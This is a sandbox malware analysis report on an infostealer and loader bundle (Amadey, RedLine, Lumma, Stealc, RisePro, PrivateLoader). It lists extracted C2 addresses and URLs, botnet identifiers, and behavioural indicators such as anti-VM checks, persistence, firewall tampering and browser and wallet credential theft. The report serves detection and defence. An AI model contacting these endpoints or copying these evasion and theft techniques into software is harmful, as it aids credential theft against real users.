amadey | 86ccbff05056433ad05dcc8dfcf5b9b89bda2b2bbbe74a609e1d333f38cee3e4

Analysis

max time kernel
376s
max time network
370s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 18:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1719859269.0326595_setup.exe
Size

4.4MB
MD5

00af1a53860550f8db3f1b250436b78a
SHA1

67dce838cd0e8410ba30b243520dc06f31c1bae6
SHA256

86ccbff05056433ad05dcc8dfcf5b9b89bda2b2bbbe74a609e1d333f38cee3e4
SHA512

48737809e446ba33530c716b5b86a218d0eb8f4e51e3c1f9856b89ce3cd663a781fe7166e7736d5005861de811c87c04cfded7d60347284abe4baefc7f488722
SSDEEP

98304:BmByncbMrvVWTLkWzE/KORxJCFDDuVI+d0l2ETsmV9:nrvVljxGSVXEs+9

Score

10^/10

amadey lumma privateloader redline risepro stealc 4dd39d default logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer loader persistence spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

stealc

Botnet

default

http://85.28.47.4

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Extracted

Family

risepro

191.101.209.39

77.105.133.27

Extracted

Family

lumma

https://potterryisiw.shop/api

https://foodypannyjsud.shop/api

https://contintnetksows.shop/api

https://reinforcedirectorywd.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 3 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	1719859269.0326595_setup.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/3416-210-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Ze9YVyObNjAE_SzfO25PFdIY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	GHJEHJJDAA.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
282	644	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4768	powershell.exe
4824	powershell.EXE
2172	powershell.exe
4132	powershell.exe
3620	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 19 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GHJEHJJDAA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Ze9YVyObNjAE_SzfO25PFdIY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Ze9YVyObNjAE_SzfO25PFdIY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GHJEHJJDAA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	GHJEHJJDAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	explorti.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	lILszpl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	gJyKMcC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	1719859269.0326595_setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	BVyOzoVQkOWlrDwuVAspBWVl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk	Ze9YVyObNjAE_SzfO25PFdIY.exe

Executes dropped EXE 30 IoCs

pid	Process
2472	hxXD2z1F2ET9Jb9lGMrJdK0J.exe
2500	91EY5fESvw87XKKeJ4tb98_g.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe
396	4Q_QZ9PDdTpSetEPSjPBGJSX.exe
1988	2PvIYDFdouKLqGQ2H2IucpPB.exe
3616	Ze9YVyObNjAE_SzfO25PFdIY.exe
5112	PdQ0NyUVaIjka90FqWF0QLmr.exe
3568	fuf1wD0JhgRWjKVyTjQfK3Vw.exe
1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp
3056	Install.exe
1976	Install.exe
4124	mp3doctorfree32_64.exe
3216	Install.exe
4248	Install.exe
1032	mp3doctorfree32_64.exe
4344	XuoCgWFoVXNBZg44KsVDooUD.exe
332	GHJEHJJDAA.exe
2004	explorti.exe
512	afeb332148.exe
2620	AKEGDAKEHJ.exe
3784	eqtpkqwqodik.exe
4500	explorti.exe
1848	Install.exe
3484	gJyKMcC.exe
1572	explorti.exe
4152	lILszpl.exe
512	explorti.exe
1964	explorti.exe
4352	explorti.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Wine	GHJEHJJDAA.exe

Loads dropped DLL 4 IoCs

pid	Process
1884	hxXD2z1F2ET9Jb9lGMrJdK0J.tmp
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
644	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0011000000023591-176.dat	themida
behavioral1/memory/3616-209-0x0000000000E60000-0x00000000017EF000-memory.dmp	themida
behavioral1/memory/3616-685-0x0000000000E60000-0x00000000017EF000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	45.155.250.90

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe"	Ze9YVyObNjAE_SzfO25PFdIY.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ze9YVyObNjAE_SzfO25PFdIY.exe

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	gJyKMcC.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	gJyKMcC.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	lILszpl.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	gJyKMcC.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
156	iplogger.org
43	bitbucket.org
51	bitbucket.org
61	bitbucket.org
64	bitbucket.org
155	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	api.myip.com
19	api.myip.com
25	ipinfo.io
28	ipinfo.io

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1560	powercfg.exe
4636	powercfg.exe
2020	powercfg.exe
4320	powercfg.exe
452	powercfg.exe
852	powercfg.exe
1128	powercfg.exe
1336	powercfg.exe

Drops file in System32 directory 35 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	gJyKMcC.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	1719859269.0326595_setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	gJyKMcC.exe
File opened for modification	C:\Windows\System32\GroupPolicy	1719859269.0326595_setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	gJyKMcC.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	gJyKMcC.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1719859269.0326595_setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	gJyKMcC.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	lILszpl.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1719859269.0326595_setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	gJyKMcC.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	gJyKMcC.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
3616	Ze9YVyObNjAE_SzfO25PFdIY.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
4932	BVyOzoVQkOWlrDwuVAspBWVl.exe
332	GHJEHJJDAA.exe
2004	explorti.exe
512	afeb332148.exe
4500	explorti.exe
1572	explorti.exe
512	explorti.exe
1964	explorti.exe
4352	explorti.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 2296 set thread context of 3416	2296	DOyexE8ZA6NdRfJg6tnCsu7_.exe	110
PID 2500 set thread context of 4484	2500	91EY5fESvw87XKKeJ4tb98_g.exe	112
PID 4344 set thread context of 4780	4344	XuoCgWFoVXNBZg44KsVDooUD.exe	127
PID 2620 set thread context of 3588	2620	AKEGDAKEHJ.exe	170
PID 396 set thread context of 3684	396	4Q_QZ9PDdTpSetEPSjPBGJSX.exe	172
PID 3784 set thread context of 2532	3784	eqtpkqwqodik.exe	178
PID 3784 set thread context of 4964	3784	eqtpkqwqodik.exe	183

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\namDtuGKU\VZIKDr.dll	gJyKMcC.exe
File created	C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\LdcVsdL.dll	gJyKMcC.exe
File created	C:\Program Files (x86)\bgwuTdWixDdNC\VwRpbry.dll	gJyKMcC.exe
File created	C:\Program Files (x86)\ATiuMetuMWHU2\eCGnGOeGLljQj.dll	lILszpl.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	gJyKMcC.exe
File created	C:\Program Files (x86)\wEnnazEvJNiU2\wVxZEIcKrDtrT.dll	gJyKMcC.exe
File created	C:\Program Files (x86)\wEnnazEvJNiU2\OywhpCY.xml	gJyKMcC.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	lILszpl.exe
File created	C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\hQdjdPo.dll	lILszpl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	gJyKMcC.exe
File created	C:\Program Files (x86)\ATiuMetuMWHU2\TUgowMo.xml	lILszpl.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	gJyKMcC.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	gJyKMcC.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	gJyKMcC.exe
File created	C:\Program Files (x86)\ZhGHGCHGxGFfhOXQOLR\pImnQkR.xml	gJyKMcC.exe
File created	C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\DUhNOUp.xml	lILszpl.exe
File created	C:\Program Files (x86)\UyPATDbiwjgOC\CCTNBjI.dll	lILszpl.exe
File created	C:\Program Files (x86)\bgwuTdWixDdNC\ipxspFO.xml	gJyKMcC.exe
File created	C:\Program Files (x86)\VcCVDDBRU\CnOGlQ.dll	lILszpl.exe
File created	C:\Program Files (x86)\UyPATDbiwjgOC\VskvzLt.xml	lILszpl.exe
File created	C:\Program Files (x86)\IchmcMfQaXUn\rflUuab.dll	lILszpl.exe
File created	C:\Program Files (x86)\namDtuGKU\xuwirHx.xml	gJyKMcC.exe
File created	C:\Program Files (x86)\kwkuzFKVqEUn\ieuxbUs.dll	gJyKMcC.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	lILszpl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	lILszpl.exe
File created	C:\Program Files (x86)\VcCVDDBRU\XxfJyMl.xml	lILszpl.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bsqNJSiTyoMLfdbIdy.job	schtasks.exe
File created	C:\Windows\Tasks\bmQWCxleEgxbTUrSZz.job	schtasks.exe
File created	C:\Windows\Tasks\explorti.job	GHJEHJJDAA.exe
File created	C:\Windows\Tasks\KdMGsZYUagVlNoZLt.job	schtasks.exe
File created	C:\Windows\Tasks\jRbEfcGJuWiRduS.job	schtasks.exe
File created	C:\Windows\Tasks\kPVQaxkVtdiJeIOQR.job	schtasks.exe
File created	C:\Windows\Tasks\nsbPTSdSgPuDRRbhc.job	schtasks.exe
File created	C:\Windows\Tasks\RShenKKeUbJzTjI.job	schtasks.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4872	sc.exe
3520	sc.exe
2532	sc.exe
3132	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
3264	2296	WerFault.exe	105
4208	2620	WerFault.exe	160
1624	1848	WerFault.exe	194
4560	4248	WerFault.exe	122
3340	3484	WerFault.exe	266
2420	3216	WerFault.exe	121
3132	4152	WerFault.exe	318

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	BVyOzoVQkOWlrDwuVAspBWVl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	BVyOzoVQkOWlrDwuVAspBWVl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4616	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d8c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	gJyKMcC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	gJyKMcC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	lILszpl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	lILszpl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2"	Install.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	gJyKMcC.exe
